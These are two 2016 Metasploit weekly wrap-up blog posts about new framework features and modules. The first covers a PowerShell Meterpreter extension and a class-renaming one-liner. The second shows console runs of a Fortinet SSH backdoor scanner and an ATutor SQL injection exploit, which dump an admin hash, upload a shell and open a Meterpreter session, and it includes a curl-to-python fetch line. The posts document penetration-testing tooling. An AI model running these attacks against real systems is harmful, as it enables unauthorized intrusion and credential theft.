Skip navigation
All Places > Metasploit > Blog > 2016 > March

Weekly Metasploit Wrapup

Posted by egypt Employee Mar 31, 2016

Powershell? In my Meterpreter?


It's more likely than you think!


Hot on the heels of his fantastic Python extension, the legendary OJ Reeves has once again busted out an awesome new ability for post-exploitation, this time by putting a fully functional powershell inside your native Windows Meterpreter sessions. Unlike the Python extension, which uploads an embedded interpreter, the new powershell extension loads the .NET runtime from the victim system.


There's a lot of polish and more work to be done here, but the shell is quite functional and gives you access to all kinds of capabilities. The next big improvement here is the ability to import files so you can take advantage of existing PS scripts, which is already in testing and should be out with the next update if everything goes to plan.


Metasploit3 is dead, long live MetasploitModule


Metasploit modules all define a class to implement their functionality. In the original plan, that class's name contained Metasploit's major version number so it would be possible to tell if a module was compatible. The way it really happened is the number just sat there doing nothing since the major version changes very infrequently. The most recent time was just after the project was acquired by Rapid7 a little over six years ago. Before that, the last time the major version changed was when the project was rewritten from scratch in 2005, ported from Perl to Ruby. In the last six years, many things have changed considerably -- APIs have been updated, moved, or deleted; new protocols have been added; someone injected SNES shellcode into Super Mario World by hand -- the world is a different place now.


Basically the idea that the major version would describe whether something is compatible was never real. So we've decided to get rid of the confusing pointless number in modules' class names and just call them MetasploitModule. Your existing custom modules will continue to work without modification, but with a warning that you should update the module's class name. You can make that update to all your custom modules with this one-liner:


find ~/.msf4/modules -name '*.rb' | xargs sed -i 's/class Metasploit[34]/class MetasploitModule/'


If you're on OS X, your sed(1) is dumb and requires an argumen to -i:


find ~/.msf4/modules -name '*.rb' | xargs sed -i '' 's/class Metasploit[34]/class MetasploitModule/'


Up Up Down Down UDP Select Start


One of my favorite things about Metasploit is its socket abstractions. The ability to create sockets from a Meterpreter session and treat them as a regular Ruby socket is very powerful -- it's what powers port forwarding and routing. Recently it came to long-time contributor sempervictus' attention that UDP didn't behave quite the same way as TCP in this regard. Because UDP sockets created on a Meterpreter session didn't return a normal socket, they couldn't be passed to the low-level select method. Now that UDP works just like TCP, it opens up some new ways we can use them for evil awesome.


Words, Words, Words


This update comes with several improvements to documentation. The first is a tool called find_release_notes that allows you to find the release notes for a given pull request or module so you can quickly figure out the historical context of when a thing made it into the stable release. You can find it in the tools/dev directory.


Next, we've added some new templates for submitting GitHub Issues and Pull Requests which will hopefully standardize the process of contributing and make it a little easier for contributors. Knowing what is expected beforehand means less back-and-forth for new contributors, smoothing out and speeding up the whole Pull Request process.


And my favorite new documentation addition in this update is a way of documenting individual modules. A new directory, documentation/modules/, matches the layout of the modules/ and contains markdown files describing how the corresponding module can best be utilized. A handful of the most important modules already have documentation and more are on the way. The great thing about it is it's just markdown, so it's super easy to write, and incidentally writing simple walkthroughs of existing modules is a great place to get started contributing. To check it out, you can use the info command's new -d flag (for "documentation") to turn that markdown into a nice HTML page and view it in a browser. There are more details in the wiki article Generating Module Documentation.


New Modules


Exploit modules (1 new)


Auxiliary and post modules (5 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.14...4.11.19

William Vu

Weekly Metasploit Wrapup

Posted by William Vu Employee Mar 14, 2016

Scanning for the Fortinet backdoor with Metasploit


Written by wvu


Metasploit now implements a scanner for the Fortinet backdoor. Curious to see how to use it? Check this out!


wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qL
msf > use auxiliary/scanner/ssh/fortinet_backdoor 
msf auxiliary(fortinet_backdoor) > set rhosts 417.216.55.0/24
rhosts => 417.216.55.0/24
msf auxiliary(fortinet_backdoor) > set threads 100
threads => 100
msf auxiliary(fortinet_backdoor) > run

[*] Scanned 35 of 256 hosts (13% complete)
[*] Scanned 84 of 256 hosts (32% complete)
[*] Scanned 90 of 256 hosts (35% complete)
[+] 417.216.55.69:22 - Logged in as Fortimanager_Access
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 174 of 256 hosts (67% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 233 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(fortinet_backdoor) > 
[1]+ Stopped ./msfconsole -qL
wvu@kharak:~/metasploit-framework:master$ python <(curl -s 417.216.55.69
FortiGate-VM64 # 
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
exit Exit the CLI.


Easy as can be.


The module doesn't get sessions yet due to complications with net-ssh, but we're working on it!


Shall we play a game, ATutor?


Written by Bill Webb




Ever wished you could live out your Wargames fantasies, easily changing your grades all while impressing the ladies?  Now you can with the addition of the ATutor 2.2.1 SQL injection module.  This module exploits the vulnerability described in CVE-2016-2555, allowing one to bypass authentication and reach the administrators interface.  While reaching the vulnerability requires one to login to ATutor as a student, remote registration is enabled by default.  Once you have gained access to the admin console, you can do all sorts of fun stuff, such as uploading malicious code ...


msf exploit(atutor_sqli) > check
[+] The target is vulnerable.
msf exploit(atutor_sqli) > exploit

[*] Started reverse TCP handler on 
[*] - Logged in as admin, sending a few test injections...
[*] - Dumping username and password hash...
[+] - Got the admin hash: bcbc84567720217d190cab05ac3bf7722f2936ca !
[*] - Logged in as admin, uploading shell...
[+] - Shell upload successful!
[*] Sending stage (33684 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-02-29 18:44:11 -0600
[+] - Deleted ocfw.php
[+] - Deleted ../../content/module/qee/ocfw.php

meterpreter >

... or pulling off their best Matthew Broderick impersonation.




It's almost like it's 1983 again.


(We can't guarantee that the ladies will in fact be impressed ...)


New modules


Exploit modules (3 new)


Auxiliary and post modules (6 new)


Get it


As always, these new features are only an msfupdate away! You can view the changes here: 4.11.10...4.11.14.

Filter Blog

By date: By tag: